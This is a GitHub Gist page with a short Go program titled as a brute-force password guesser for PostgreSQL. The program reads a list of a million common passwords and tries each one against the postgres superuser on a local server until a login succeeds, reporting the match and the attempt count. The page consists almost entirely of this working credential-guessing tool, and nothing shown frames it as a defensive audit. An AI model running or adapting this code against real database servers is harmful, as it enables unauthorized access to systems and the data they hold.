Last active
October 11, 2023 21:49
-
-
Save kmoppel/4f29d6bd22d80a2c627195059388b64d to your computer and use it in GitHub Desktop.
Brute force password guesser for Postgres
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
package main | |
import ( | |
"bufio" | |
"fmt" | |
"log" | |
"net/url" | |
"os" | |
"time" | |
"database/sql" | |
_ "github.com/lib/pq" | |
) | |
var connStr string = "postgresql://postgres:%s@localhost:5432/postgres?sslmode=disable" | |
var pwFile string = "top-1m-pw.txt" | |
func getPostgresDBConnection(libPqConnString string) (*sql.DB, error) { | |
var err error | |
var db *sql.DB | |
db, err = sql.Open("postgres", libPqConnString) | |
if err != nil { | |
return nil, err | |
} | |
return db, err | |
} | |
func main() { | |
var curTime time.Time | |
start_time := time.Now() | |
lastProgressMsg := start_time | |
attempts := 0 | |
var pwd string | |
var t *url.URL | |
f, err := os.OpenFile(pwFile, os.O_RDONLY, os.ModePerm) | |
if err != nil { | |
log.Fatalf("open file error: %v", err) | |
} | |
rd := bufio.NewReader(f) | |
for { | |
pwd, err = rd.ReadString('\n') | |
if pwd == "" || err != nil { | |
log.Fatalf("exiting. pwd: %s, err: %v", pwd, err) | |
} | |
t = &url.URL{Path: string(pwd[:len(pwd)-1])} // password can include funny chars which need escaping | |
conn, err := getPostgresDBConnection(fmt.Sprintf(connStr, t.String())) | |
if err != nil { | |
log.Fatal("failed to initialize conn", err) | |
} | |
err = conn.Ping() | |
attempts++ | |
curTime = time.Now() | |
if err != nil { | |
// quite expected... | |
} else { | |
fmt.Println("password MATCH:", pwd) | |
fmt.Println("attempts:", attempts) | |
fmt.Println("runtime:", curTime.Sub(start_time)) | |
return | |
} | |
if lastProgressMsg.Before(curTime.Add(time.Second * -10)) { | |
fmt.Println("attempts:", attempts) | |
fmt.Println("runtime:", curTime.Sub(start_time)) | |
lastProgressMsg = curTime | |
} | |
} | |
} |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment